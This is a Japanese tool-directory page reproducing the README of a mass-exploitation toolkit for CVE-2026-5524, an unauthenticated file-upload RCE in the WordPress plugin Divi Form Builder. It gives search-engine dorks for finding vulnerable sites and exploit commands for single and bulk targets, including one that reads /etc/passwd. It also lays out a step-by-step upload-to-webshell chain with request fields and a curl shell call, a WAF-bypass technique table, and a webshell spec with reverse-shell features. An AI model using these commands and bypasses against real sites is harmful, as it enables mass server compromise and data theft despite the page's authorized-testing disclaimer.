Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/caterscam/cve-2026-5524-poc
偵察脆弱性スキャナーエクスプロイトシェルコードウェブアプリケーション悪用情報収集WAFバイパスペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHub
1142ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
caterscam/cve-2026-5524-poc

CVE-2026-5524-PoC

CVE-2026-5524用のマスエクスプロイトツールキット。Divi Form Builderにおける非認証ファイルアップロードRCEです。マルチスレッドスキャン、WAF回避手法、カスタムウェブシェルの展開、対話型コマンド実行を備えています。

リポジトリを見る

CVE-2026-5524 — Divi Form Builder 認証なしRCE

CVE-2026-5524 のための大量エクスプロイトツールキット。WordPress プラグイン Divi Form Builder <= 5.1.8 における認証なしの任意ファイルアップロード脆弱性により、リモートコード実行が可能になります。

version Devon Aji python telegram

フィールド値
CVE2026-5524
CVSS9.8 (緊急)
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影響を受けるバージョンDivi Form Builder <= 5.1.8
修正バージョン5.1.9
タイプ認証なしファイルアップロードからRCE
研究者0xd4rk5id3 - EnvoraSec

目次

  • 説明
  • ダーク
  • インストール
  • 使い方
    • 単一ターゲット
    • 大量エクスプロイト
    • 高度なバイパス
    • コマンド実行
  • 脆弱性の詳細
  • バイパス手法
  • 技術スタック
  • プロジェクト構成
  • 攻撃フロー
  • 免責事項

説明

WordPress 用 Divi Form Builder プラグインには、認証なしの任意ファイルアップロード脆弱性が存在します。do_image_upload() ハンドラは、ユーザー制御の acceptFileTypes POST パラメータを、ファイル拡張子の検証に使用される正規表現に直接渡します。phtml などの値を指定することで、攻撃者は .php 拡張子のみをブロックするプラグインの .htaccess ルールをバイパスし、PHP で実行可能な拡張子(.phtml, .phar, .php5, .php7 など)を持つウェブシェルをアップロードできます。

ファイルが /wp-content/uploads/de_fb_uploads/ に配置されると、Apache はそれを PHP として実行し、攻撃者にウェブサーバーユーザーとしてのリモートコード実行を許可します。

この問題は Divi Form Builder 5.1.9 で修正されました。


ダーク

FOFA

root@kitploit:~
body="de_fb_obj" && body="fb_nonce"

Shodan

root@kitploit:~
http.html:"de_fb_obj" http.html:"fb_nonce"

Google

root@kitploit:~
inurl:"/wp-content/plugins/divi-form-builder/"

ZoomEye

root@kitploit:~
app:"WordPress" && body:"de_fb_obj"

Censys

root@kitploit:~
services.http.response.body: "de_fb_obj"

インストール

必要条件: Linux, macOS, WSL 上の Python 3.8 以降。

root@kitploit:~
git clone https://github.com/caterscam/CVE-2026-5524-PoC/
cd CVE-2026-5524-PoC
pip3 install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

使い方

単一ターゲット

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com

大量エクスプロイト

root@kitploit:~
python3 CVE-2026-5524.py -l targets.txt --shell-file bypass.phtml --aggressive --no-verify -o pwned.jsonl -t 20

高度なバイパス

WAF (NinjaFirewall, Wordfence, ModSecurity) の背後にあるターゲット、または強化された Apache や nginx 設定を使用しているターゲット向け。

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --shell-file bypass.phtml --aggressive --no-verify --debug

コマンド実行

アップロード成功後、スクリプトはすぐにコマンドを実行するか、対話型シェルを起動できます。

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --cmd "id; uname -a; cat /etc/passwd"
python3 CVE-2026-5524.py -u https://target.com --shell

フラグ


脆弱性の詳細

脆弱なコード

脆弱なハンドラは、ユーザー入力をサニタイズせずに正規表現を構築します。

root@kitploit:~
public function do_image_upload() {
    $accepted = $_POST['acceptFileTypes'];
    $pattern  = '/\\.(' . $accepted . ')$/i';

    if (preg_match($pattern, $filename)) {
        move_uploaded_file($tmp, $dest);
    }
}

acceptFileTypes=phtml を送信すると、結果の正規表現 /\.(phtml)$/i は .phtml で終わるファイル名に一致します。プラグイン自身の .htaccess ファイルは .php 拡張子のみをブロックします。Apache はアップロードされたファイルを PHP として実行し、リモートコード実行を引き起こします。

確認された攻撃チェーン

  1. Divi Form Builder フォームを埋め込んだページ(/, /contact, /quote など)をクロールします。?nocache=<random> パラメータを追加して、Varnish、WP Rocket、その他のページキャッシュが古いノンスを提供するのを防ぎます。

  2. ローカライズされた JavaScript オブジェクトから fb_nonce 値を抽出します:

    root@kitploit:~
    de_fb_obj = {"fb_nonce":"<10 hex characters>", ...}
    
  3. 次の内容でマルチパートフォームを /wp-admin/admin-ajax.php に POST します:

    root@kitploit:~
    action=de_fb_image_upload
    fb_nonce=<nonce>
    acceptFileTypes=phtml
    [email protected]
    
  4. JSON レスポンスからファイル URL を読み取ります:

    root@kitploit:~
    {"files":[{"name":"abc123.phtml","url":"https://target/wp-content/uploads/de_fb_uploads/abc123.phtml",...}]}
    
  5. base64 エンコードされたコマンドでシェルをリクエストします:

    root@kitploit:~
    curl "https://target/wp-content/uploads/de_fb_uploads/abc123.phtml?x=$(echo -n id | base64)"
    

バイパス手法

スクリプトは各手法を優先順位で試行し、--aggressive が設定されている場合は、最初のアップロードが成功を報告した後でもすべての手法を試みます。


技術スタック

エクスプロイトスクリプト

カスタムシェル (bypass.phtml)


プロジェクト構成

root@kitploit:~
cve-2026-5524/
|-- CVE-2026-5524.py          メインのエクスプロイトスクリプト
|-- bypass.phtml              16 KB 多層PHPウェブシェル
|-- htaccess_enable.phtml     再有効化する .htaccess を書き込むドロッパー
|-- user_ini.phtml            PHP-FPM 用の .user.ini を書き込むドロッパー
|-- targets.txt               ターゲットリストの例
|-- pwned.jsonl               大量スキャン中に -o フラグで生成
|-- requirements.txt          Python 依存関係
`-- README.md                 本ドキュメント

攻撃フロー

root@kitploit:~
+--------------------------------------------------+
| 1. 偵察                                          |
|    GET /?nocache=<random>                        |
|    de_fb_obj から fb_nonce を解析                 |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 2. エクスプロイトの作成                           |
|    POST /wp-admin/admin-ajax.php                 |
|    action=de_fb_image_upload                     |
|    acceptFileTypes=phtml                         |
|    [email protected]                             |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 3. サーバーがファイルを受け入れ保存                |
|    /uploads/de_fb_uploads/<random>.phtml         |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 4. 実行                                           |
|    GET shell.phtml?x=base64(command)             |
|    リモートコード実行達成                          |
+--------------------------------------------------+

免責事項

このツールは教育目的および許可されたペネトレーションテストでの使用のために提供されています。許容される使用例は次のとおりです。

  • 対象のテストを明示的に許可するバグバウンティプログラム
  • キャプチャ・ザ・フラグ競技および専用ラボ環境
  • 資産所有者からの書面による許可を得た内部セキュリティ評価
  • 管理された環境で行われる学術的なセキュリティ研究

所有していない、またはテストの明示的な書面による許可がないシステムに対する不正使用は、事実上すべての法域で違法であり、厳しく禁止されています。作者はこのコードの誤用を容認せず、責任を負いません。

J'ai la permission et je suis autorisé à effectuer ce pentest. (私は許可を得ており、このペネトレーションテストを実施する権限があります。)

関連すると思われる法律には、インドネシアのUU ITE、米国のコンピュータ詐欺および濫用防止法、EUのサイバー犯罪条約、およびその他の同等の法律が含まれます。疑わしい場合は、まず書面による許可を取得してください。


ライセンス

教育目的のみ。利用条件の全文は免責事項のセクションを参照してください。

ツールをダウンロード
フラグ説明
-u URL単一ターゲットのURL
-l FILEターゲットリストを含むファイル、1行に1URL
-t N同時スレッド数(デフォルト10)
--timeout Nリクエストタイムアウト(秒)(デフォルト15)
-o FILE結果をJSONL出力ファイルに保存
--proxy URLHTTPプロキシ経由でトラフィックをルーティング
--nonce HASH手動で提供されたノンスを使用し、自動検出をスキップ
--ext EXT完全なバイパスリストの代わりに単一の拡張子を強制
--shell成功時に対話型RCEシェルを起動(単一ターゲットのみ)
--cmd CMDターゲット上で1つのコマンドを実行して終了
--shell-file FILE組み込みの代わりにカスタムシェルペイロードをアップロード
--no-verifyアップロード後のRCE検証手順をスキップ
--strict-verifyシェルURLがHTTP 200を返すことを確認して誤検出をフィルタリング
--user-iniPHP-FPM環境向けに.user.iniドロッパーをアップロード
--htaccessApache環境向けに.htaccess再有効化ファイルをアップロード
--aggressive利用可能なすべてのバイパス手法を有効化
--null-byteヌルバイトと二重拡張子の試行を含める
--path-traversal/uploads/YYYY/MM/ サブディレクトリへのアップロードを試行
--debug診断用に生のHTTPレスポンスを出力
#手法対象
1代替PHP拡張子 .phtml, .phar, .php5, .php7, .php4, .pht, .shtml.php のみをブロックするプラグインの .htaccess ルール
2大文字小文字のバリエーション .PHTML, .PHP5, .PhTmL大文字小文字を区別するWAFシグネチャ (NinjaFirewall)
3二重拡張子 .phtml.jpg, .php.jpgApache mod_mime のコンテンツネゴシエーションの癖
4ヌルバイト .php%00.jpg, .phtml%00.txt古いPHPバージョン (5.3.4未満) および特定のパーサー
5末尾のスペースまたはドット .php , .php.Windows IIS および古い Apache バージョン
6Content-Type のなりすまし application/octet-streamマルチパート Content-Type ヘッダーをキーとする WAF
7.gif, .png, .jpg, .txt, .html などに対してPHPを再び有効にする実際の .htaccess をアップロードAllowOverride All が設定された Apache サーバー
8auto_prepend_file を含む .user.ini をアップロードPHP-FPM 環境
9マルチパート境界操作によるファイル名インジェクションリクエストボディを再解析するプロキシとWAF
10ファイル名におけるパストラバーサル ../shell.phtmlプラグインのディレクトリ制限
コンポーネント技術
言語Python 3.8+
HTTPクライアントrequests
TLS処理自己署名証明書のための非セキュアモードの urllib3
並行処理大量スキャンのための concurrent.futures.ThreadPoolExecutor
解析ノンス抽出のための re、レスポンス処理のための json
エンコーディングウェブシェルコマンドパラメータのための base64
CLI19個の設定可能フラグを持つ argparse
コンポーネント技術
言語PHP 7.0+
実行関数system(), shell_exec(), proc_open(), passthru(), popen()
フロントエンドプレーンHTMLフォーム、JavaScriptフレームワークなし
機能ファイルブラウザ、コマンド実行、データベースアクセス、リバースシェル、自己インストール型 .htaccess と .user.ini
サイズ約16 KB
バイパス層6つの独立した実行パスとエンコードされたペイロード